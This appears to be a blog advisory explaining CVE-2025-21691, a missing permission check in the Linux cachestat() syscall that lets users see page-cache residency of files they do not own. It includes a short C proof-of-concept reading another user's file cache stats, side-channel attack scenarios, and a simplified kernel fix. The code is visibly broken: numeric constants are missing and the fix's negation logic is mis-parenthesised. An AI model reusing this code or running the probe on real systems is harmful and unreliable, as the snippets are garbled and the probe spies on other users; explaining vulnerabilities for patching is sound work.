A new vulnerability labeled CVE-2025-21691 affected the Linux kernel by allowing unauthorized processes to query sensitive page cache statistics they shouldn't see. It arose from a permission check oversight in the new cachestat() syscall—a recent addition designed to give programs fast, convenient access to information about which parts of files are resident in memory. Let's break down what happened, how attackers could abuse this, how the Linux community reacted, and how it was fixed.
What is cachestat()?
Before CVE-2025-21691, the main way to check page cache usage (whether a section of a file is currently in RAM) was mincore(). This required mapping files into process memory, which was slow and awkward.
To solve this, commit cf264e1329fb introduced the cachestat() syscall. Instead of mapping, it could take a file and give cache residency info directly—making things simpler for programs like monitoring tools and database software.
The Bug: Missing Permission Check
However, cachestat() missed an important step. The existing syscall, mincore(), had been updated a while back (commit 134fca9063ad) to be conservative: it only allowed you to see cache stats if you owned the file or had permission to write to it.
But the new cachestat() code forgot this check. This meant any user with read access could now get detailed memory residency info for any file they could open, even if they shouldn't know which parts were in the page cache. In multi-user or containerized environments, this could leak sensitive information or facilitate side-channel attacks.
Example Exploit
Suppose user alice has a file only she modifies, but everyone else can read.
Without this patch, *any user* could run cachestat() against Alice's file
// PoC: Query cache stats of a world-readable file
int fd = open("/home/alice/.secret_data", O_RDONLY);
struct cachestat cs;
cs.start = ;
cs.end = 4096;
if (cachestat(fd, &cs, sizeof(cs), ) == ) {
printf("Cached pages: %llu\n", cs.cached);
}
Using this method, an attacker could tell when Alice last accessed the file, deduce some of her activity, or even measure activity patterns on shared databases.
Attack Scenarios
- Privacy Leaks: Malicious users could infer access patterns for confidential files, learning when others are reading or writing to them.
- Side-channel Attacks: Attackers could monitor which files are in cache before and after certain operations, potentially extracting sensitive info (e.g., database access or encryption keys).
- Container Escape / Noisy Neighbor: In cloud or containerized hosting, a user could learn about other tenants’ activity.
The Fix: Proper Permission Checks
To fix CVE-2025-21691, Linux developers applied the same conservative permission checking from mincore() to cachestat().
Now, you must either own the file or have writable access to see cache details for it. Here’s the core logic added (simplified):
// In the kernel's cachestat implementation...
if (!file_inode(file)->i_uid == current_fsuid() &&
!file->f_mode & FMODE_WRITE &&
!capable(CAP_FOWNER)) {
return -EACCES;
}
This makes sure no one else can spy on cached status of files they don’t write to or own.
Original cachestat() syscall:
cf264e1329fb - cachestat: implement cachestat syscall
Related mincore() hardening:
134fca9063ad - mm/mincore.c: make mincore() more conservative
Cachestat permission check fix:
Linux patch discussion
Actual patch in mainline (patch id TBA)
What Should Users Do?
If you manage a multi-user, shared, or security-sensitive Linux system, update your kernel to include this patch ASAP.
Check with your distro for the CVE-2025-21691 fixbackport. On running systems, apply the update and reboot.
Conclusion
CVE-2025-21691 is a classic case of "secure by default" principles mattering. Even seemingly harmless system calls can be abused for privacy leaks if permission checks aren't airtight. Thanks to prompt work by kernel developers, the bug was closed before much damage could be done. As always, keep your systems patched!
*Stay safe—and never trust a new syscall without reading the fine print.*
References
- Linux Kernel Archive - cachestat patch
- Linux Kernel commit browser
- CVE-2025-21691 entry (populated soon)
Timeline
Published on: 02/10/2025 16:15:38 UTC
Last modified on: 05/04/2025 07:19:08 UTC